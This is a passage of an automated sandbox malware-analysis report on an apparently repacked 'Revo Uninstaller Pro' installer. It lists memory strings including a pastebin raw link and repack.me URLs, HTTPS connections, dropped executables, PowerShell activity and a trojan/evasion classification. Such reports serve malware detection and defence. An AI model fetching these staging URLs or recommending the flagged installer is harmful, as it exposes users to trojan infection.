      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362580830.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362051607.000000000B276000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191327824.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191500182.000000000B276000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362051607.000000000B276000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191500182.000000000B276000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/rosoft
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362051607.000000000B260000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159782360.000000000B282000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191327824.000000000B29C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/tsjtmfdm.pkg
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362580830.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191327824.000000000B29C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/tsjtmfdm.pkg2
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362580830.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191327824.000000000B29C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/tsjtmfdm.pkgW
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362580830.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191327824.000000000B29C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/tsjtmfdm.pkgZ
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362580830.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191327824.000000000B29C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/tsjtmfdm.pkgo
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362580830.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191327824.000000000B29C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/y
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://opera.com/privacy
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159925120.000000000B245000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191694426.000000000B245000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362624154.000000000B245000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159703361.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362051607.000000000B276000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191500182.000000000B276000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vkwZzU9B
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159455427.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159703361.000000000B29C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vkwZzU9B.
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777185500.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2775823777.00000000006D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vkwZzU9BHI
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777185500.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2775823777.00000000006D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vkwZzU9Bd
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2776929770.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vkwZzU9Bget8191
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777185500.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2775823777.00000000006D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vkwZzU9Bs
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159553605.000000000B276000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362051607.000000000B276000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191500182.000000000B276000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vkwZzU9Bt
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159455427.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159703361.000000000B29C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vkwZzU9By2
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://policies.google.com/terms;
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://redir.opera.com/uninstallsurvey/
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2776929770.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://repack.me/ad.html
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://sourcecode.opera.com
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://telegram.org/tos/
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://twitter.com/en/tos;
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://www.opera.com
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://www.opera.com..
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://www.opera.com/
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://www.opera.com/download/
      Source: setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://www.opera.com/privacy
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.revouninstaller.com/buy-update-subscription-btn/https://www.revouninstaller.com/buy-now-
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/contact-us/C:
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/downloads-manager/?filename=pro-%shttps://www.revouninstaller.com/up
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/feedback/?product=pro
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.revouninstaller.com/feedback/?product=pro%d-%d-%dLast
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/revo-uninstaller-mobile-qr-and-link/
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.revouninstaller.com/revo-uninstaller-mobile-qr-and-link/Software
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/revo-uninstaller-pro-full-version-history/)
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.revouninstaller.com/support/
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.revouninstaller.com/updatepro5.xmlhttps://www.revouninstaller.com/downloads-manager/?fil
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.revouninstaller.comAffHomewww.revouninstaller.comwww.revouninstallerpro.com
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstallerpro.com/db/ilogs/.ruelDelete
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.revouninstallerpro.com/db/ilogs/Uninstaller
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://www.whatsapp.com/legal;
      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
      Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 194.87.189.43:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.167.96.30:443 -> 192.168.2.4:49824 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.167.96.38:443 -> 192.168.2.4:49849 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.167.96.39:443 -> 192.168.2.4:49850 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.167.125.189:443 -> 192.168.2.4:49851 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.167.96.30:443 -> 192.168.2.4:49857 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.167.96.36:443 -> 192.168.2.4:49858 version: TLS 1.2
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_00405866 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405866
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FD6FC6: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,16_2_00FD6FC6
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403665
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeCode function: 26_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,26_2_00403665
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sysJump to behavior
      Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\system32\DRIVERS\SETB88F.tmpJump to behavior
      Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\system32\DRIVERS\SETB88F.tmpJump to behavior
      Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\system32\DRIVERS\SETB88F.tmpJump to behavior
      Source: C:\Windows\System32\rundll32.exeFile deleted: C:\Windows\System32\drivers\SETB88F.tmpJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_00406DC00_2_00406DC0
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FE626D16_2_00FE626D
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FD83C016_2_00FD83C0
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FD30FC16_2_00FD30FC
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FFC0B016_2_00FFC0B0
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FF011316_2_00FF0113
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FE33D316_2_00FE33D3
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FEF3CA16_2_00FEF3CA
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FDF5C516_2_00FDF5C5
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FFC55E16_2_00FFC55E
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FF054816_2_00FF0548
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FDE51016_2_00FDE510
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FE66A216_2_00FE66A2
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FD269216_2_00FD2692
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FE364E16_2_00FE364E
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_0100065416_2_01000654
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FEF8C616_2_00FEF8C6
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FE589E16_2_00FE589E
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FE397F16_2_00FE397F
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FDE97316_2_00FDE973
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FDDADD16_2_00FDDADD
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FDBAD116_2_00FDBAD1
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FEFCDE16_2_00FEFCDE
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FE6CDB16_2_00FE6CDB
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FF3CBA16_2_00FF3CBA
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FD5D7E16_2_00FD5D7E
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FF3EE916_2_00FF3EE9
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FD3EAD16_2_00FD3EAD
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FDDF1216_2_00FDDF12
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_048CB56017_2_048CB560
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_048CB55117_2_048CB551
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_048C97D817_2_048C97D8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_0768230817_2_07682308
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_07680DB017_2_07680DB0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_0517B57821_2_0517B578
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_0517B56921_2_0517B569
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_08D465D821_2_08D465D8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_08D44AA021_2_08D44AA0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_0467B58023_2_0467B580
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_0467B56523_2_0467B565
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_082759B023_2_082759B0
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeCode function: 26_2_00406DC026_2_00406DC0
      Source: Joe Sandbox ViewDropped File: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll BDA04B693BFDEA86A7A3B47F2E4CEAE9CD9475C4E81B0AA73B70FD244A65F70F
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: String function: 00FED940 appears 51 times
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: String function: 00FED870 appears 35 times
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: String function: 00FEE2F0 appears 31 times
      Source: setup.exe.27.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
      Source: setup.exe.28.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
      Source: ruplp.exe.0.drStatic PE information: Number of sections : 11 > 10
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameinetc.dllF vs Revo.Uninstaller.Pro.v5.3.4.exe
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.00000000033A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRevoAppBar.exeJ vs Revo.Uninstaller.Pro.v5.3.4.exe
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRevoUninPro.exeD vs Revo.Uninstaller.Pro.v5.3.4.exe
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRevoUnPro.exeD vs Revo.Uninstaller.Pro.v5.3.4.exe
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerevoflt.sysJ vs Revo.Uninstaller.Pro.v5.3.4.exe
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRUExt.dll^ vs Revo.Uninstaller.Pro.v5.3.4.exe
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000005140000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRevoAppBar.exeJ vs Revo.Uninstaller.Pro.v5.3.4.exe
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRevoUninPro.exeD vs Revo.Uninstaller.Pro.v5.3.4.exe
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRevoUPPort.exe@ vs Revo.Uninstaller.Pro.v5.3.4.exe
      Source: Revo.Uninstaller.Pro.v5.3.4.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal44.troj.evad.winEXE@44/128@9/7
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FD6D06 GetLastError,FormatMessageW,16_2_00FD6D06
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403665
